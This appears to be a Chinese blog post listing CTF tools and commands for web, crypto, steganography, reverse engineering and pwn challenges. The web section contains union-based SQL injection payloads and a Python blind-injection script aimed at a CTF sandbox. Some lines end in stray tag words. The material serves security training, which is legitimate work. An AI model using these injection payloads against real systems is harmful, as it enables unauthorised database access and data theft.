[持續更新] CTFtools

本篇文章整理了在作CTF練習過程當中的各類工具,方便本身查找和一樣玩CTF的朋友查看。php

 

WEB 

sqlmaphtml

123313 union select 1,2#
123313 union select 1,database()#
123313 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"#
123313 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#
123313 union select 1,flag from sqli.flag#
普通手工注入

 

報錯注入

 

import string
import requests

name = ''
strall = string.ascii_lowercase + string.digits + string.punctuation
# for k in range(1,15):
for j in range(1,50):
    for i in strall:
        # 查數據庫名
        # datas = "if(substr(database(),%d,1)='%s',1,(select table_name from information_schema.tables))"% (j,i)
        # 查表名
        # datas = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(k,j,i)
        # 查列名
        # datas = "if(substr((select column_name from information_schema.columns where table_name='zqjsjpvifa' and table_schema='sqli'),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(j,i)
        # 查內容
        # datas = "if(substr((select wdiqllcsoi from sqli.zqjsjpvifa),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(j,i)
        re = requests.get('http://challenge-0c37e62039a49553.sandbox.ctfhub.com:10080/?id='+datas)
        html = re.text
        # print(html)
        if "ctfhub" in html:
            name += i
            print(name)
            break
布爾盲注

 

時間盲注

 

抓包java

Burppython

hackbarlinux

Fuzz字典 git

https://github.com/TheKingOfDuck/fuzzDictsgithub

https://github.com/1N3/IntruderPayloads算法

Git泄露sql

https://github.com/BugScanTeam/GitHackshell

https://github.com/WangWen-Albert/JGitHack

https://github.com/gakki429/Git_Extract

.DS_store泄露  https://github.com/lijiejie/ds_store_exp

http://java-decompiler.github.io/  java 反編譯 

反序列化  https://www.w3cschool.cn/tools/index?name=unserialize

 

加密

rsa

在線分解大素數  http://www.factordb.com/index.php
Python的gmpy二、libnum包
RSATools
CTF-RSA-tool

密碼分析腳本  https://github.com/jameslyons/python_cryptanalysis

wolfram  用於各種密碼算法分析的在線工具

quipqiup  自動密碼求解器

柵欄加密  https://www.qqxiuzi.cn/bianma/zhalanmima.php

 

 

雜項

http://www.efittech.com/hxdec.html  識別漢信碼

angr fuzz  angr安裝

1.安裝依賴(基本開發環境):
sudo apt-get install python-dev libffi-dev build-essential virtualenvwrapper
 
2.virtualenvwrapper初始化:
首先設置一個環境變量WORKON_HOME
export WORKON_HOME=$HOME/Python-workhome
這裏的$HOME/Python-workhome就是準備放置虛擬環境的地址
 
啓動virtualenvwrapper.sh腳本
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
注意:可使用whereis virtualenvwrapper.sh命令查看腳本的位置
 
3.在python3的環境下安裝angr:
mkvirtualenv --python=$(which python3) angr && pip install angr
 
4.安裝好後在其餘的命令在一個新的終端窗口直接運行workon,並無建立的angr虛擬環境,須要執行下面兩條命令才能夠:
export WORKON_HOME=$HOME/Python-workhome
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
能夠寫一個shell腳本包含兩條命令,之後直接運行shell腳本便可。

virtualenvwrapper操做命令: 
 
建立環境 
mkvirtualenv env1  
環境建立以後,會自動進入該目錄,並激活該環境。

切換或進入環境 
workon env1 

列出已有環境 
workon 

退出環境 
deactivate 

刪除環境 
rmvirtualenv
angr安裝
1
import angr

p = angr.Project('martricks',auto_load_libs=False)
state = p.factory.entry_state()
simg = p.factory.simgr(state)
simg.explore(find=0x400A84,avoid=0x400A90)
simg.found[0].posix.dumps(0)

2
import angr

p = angr.Project("martricks")
simgr = p.factory.simulation_manager(p.factory.full_init_state())
simgr.explore(find=0x400A84, avoid=0x400A90)
simgr.found[0].posix.dumps(0)
fuzz代碼

ASCII 在線轉換器

生成紅黑樹

https://gchq.github.io/CyberChef/  編碼轉換工具

CaptfEncoder  編碼轉換工具  https://github.com/guyoung/CaptfEncoder/releases

 rot13

DAPR 密碼破解

DAPR

Rabin加密 

Rabin

 JSFuck  ()+[]!

Brainfuck/Ook

jjencode與aaencode解密     $=~[];$={___:++$,$$$$:    ゚ω゚ノ= /`m´)ノ ~┻━┻ / ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) 

新約佛論禪/佛曰  http://hi.pcmoe.net/buddha.html

與佛論禪  http://www.keyfc.net/bbs/tools/tudoucode.aspx

CTF在線工具   http://ctf.ssleye.com/

cmd5  https://www.cmd5.com/

盲水印隱寫  https://github.com/chishaxie/BlindWaterMark        python bwm.py decode 1.png 2.png flag.png(圖片必須在py目錄下…)

掃碼  https://online-barcode-reader.inliteresearch.com/

數據包修復  http://f00l.de/hacking/pcapfix.php

音頻提取數字號碼  dtmf2num.exe

                           

 

 

               

 

 

 

隱寫

binwalk -e  用於搜索給定二進制鏡像文件以獲取嵌入的文件和代碼的工具

dd if=隱寫文件 of=輸出文件 skip=偏移 bs=1

foremost  用來文件還原分離

Steghide  將文件隱藏到圖片或音頻中的工具

安裝
apt-get install steghide

隱藏文件
steghide embed -cf [圖片文件載體] -ef [待隱藏文件]
steghide embed -cf 1.jpg -ef 1.txt

查看圖片中嵌入的文件信息
steghide info 1.jpg

提取圖片中隱藏的文件
steghide extract -sf 1.jpg
steghide

LSB-Steganography  LSB隱寫  https://github.com/RobinDavid/LSB-Steganography

Usage
LSBSteg.py

Usage:
  LSBSteg.py encode -i <input> -o <output> -f <file>
  LSBSteg.py decode -i <input> -o <output>

Options:
  -h, --help                Show this help
  --version                 Show the version
  -f,--file=<file>          File to hide
  -i,--in=<input>           Input image (carrier)
  -o,--out=<output>         Output image (or extracted file)
LSB-Steganography

stegsolve  圖片隱寫查看器   http://www.caesum.com/handbook/Stegsolve.jar

stegdetect  自動化數字圖像隱寫分析工具

jphide

檢測該圖片用的是哪一種加密方式
stegdetect.exe -tjopi -s 10.0 hide.jpg

用stegdetect下的stegbreak字典破解,一樣圖片和stegbreak.exe在同一目錄下
stegbreak.exe -r rules.ini -f password.txt -r p hide.jpg

使用jphide下的工具JPHS從hide.jpg圖片提取出隱藏信息

 

snow html隱寫  http://fog.misty.com/perry/ccs/snow/snow/snow.html

snow 是一款在html嵌入隱寫信息的軟件,
它的原理是經過在文本文件的末尾嵌入空格和製表位的方式嵌入隱藏信息,
不一樣空格與製表位的組合表明不一樣的嵌入信息。
snow

ezgif  GIF 在線分幀工具

Audacity  一款免費的音頻處理軟件,經常使用於音頻隱寫

MP3Stego  音頻隱寫工具

MSU StegoVideo  AVI 視頻隱寫

F5-steganography  F5隱寫

pngcheck  檢查PNG圖片數據段的工具

wbs43open  PDF隱寫

寬字節隱寫  https://offdev.net/demos/zwsp-steg-js

視頻隱寫  ffmpeg -i 裏面都是出題人.avi  -f image2 image-%05d.jpg

Steghide  一個命令行實用程序,可幫助咱們隱藏圖像或音頻文件中的機密數據,它支持JPEG、BMP、WAV和AU文件。

$ sudo apt install steghide

如今,你能夠將機密文件隱藏在圖像或音頻中,以下所示,我假設你已將要加密的機密文件和圖像或音頻文件放在同一文件夾中,若是將它們放在不一樣的文件夾中,則須要在如下命令中提供完整路徑:

$ steghide embed -ef secret.txt -cf ostechnix.jpg

系統會要求你輸入密碼:

Enter passphrase: 

Re-Enter passphrase: 

embedding "secret.txt" in "ostechnix.jpg"... done

在上面的示例中,我將名爲secret.txt的文本文件嵌入到名爲ostechnix.jpg的圖像文件中,你如今能夠刪除原始的secret.txt文件,由於,咱們只是嵌入了一個圖像文件,若是要嵌入多個文件,請將它們放在一個文件夾中並壓縮,而後按上述方法隱藏它。

要從圖像中提取祕密文件,只需運行:

$ steghide extract -sf ostechnix.jpg

輸入密碼以將其解壓縮:

Enter passphrase: 

wrote extracted data to "secret.txt".
安裝和使用Steghide的方法

 

Outguess  一個命令行stegnographic工具,用於隱藏圖像中的機密文件,目前,它支持PPM、PNM和JPEG圖像格式。

$ sudo apt install outguess

安裝後,轉到保存機密文件和圖像的位置,而後使用如下命令將機密文件嵌入到圖像中:

$ outguess -d secret.txt ostechnix.jpg output.jpg

這裏,output.jpg文件是包含咱們的機密數據文件的文件,保持安全並刪除其餘全部內容。

你還能夠將密碼短語添加到輸出文件中,以下所示:

$ outguess -k "my secret key:ywnz" -d secret.txt ostechnix.jpg output.jpg

用你本身的密碼替換「my secret key:ywnz」。

要提取文件,只需執行如下操做:

$ outguess -r output.jpg secret.txt

若是你使用了密碼,則使用此命令:

$ outguess -k "my secret key:ywnz" -r output.jpg secret.txt
安裝和使用Outguess的方法

 

 

逆向

QEMU full-system

IDA Pro 一款功能豐富的跨平臺多處理器反彙編程序和調試器

OD

Ghidra

Detect It Easy

jadx-gui  Android/Java反編譯

JEB  Android逆向工具,能夠反編譯和調試二進制代碼

jd-gui  將 class 文件反編譯爲 Java 源代碼

Apktool  主要用於逆向 apk 文件。它能夠將資源解碼,並在修改後能夠從新構建它們。

dnSpy  一款.NET程序調試器和反編譯器

ApkIDE  

dex2jar

 

PWN

 

gdb linux程序動態調試  apt-get install gdb

gdb-peda  gdb調試工具

gdb-peda安裝

objdump和readelf  快速查看二進制文件信息的工具

pwntools  PWN工具集,寫exp和poc的工具  pip install pwntools  http://docs.pwntools.com/en/stable/

checksec  檢查保護機制   apt-get install checksec

ROPgadget  找ROP連接  https://github.com/JonathanSalwan/ROPgadget.git

one_gadge    thttps://github.com/david942j/one_gadget

LibcSearcher  泄露libc版本  (GitHub下載極慢,gitee)

安裝
git clone https://github.com/lieanu/LibcSearcher.git
cd LibcSearcher
python setup.py develop
LibcSearcher

libc-database  https://github.com/niklasb/libc-database

DynELF  查到libc的版本

一條集合安裝 apt-get install nasm gdb gcc binutils hexedit

相關文章
相關標籤/搜索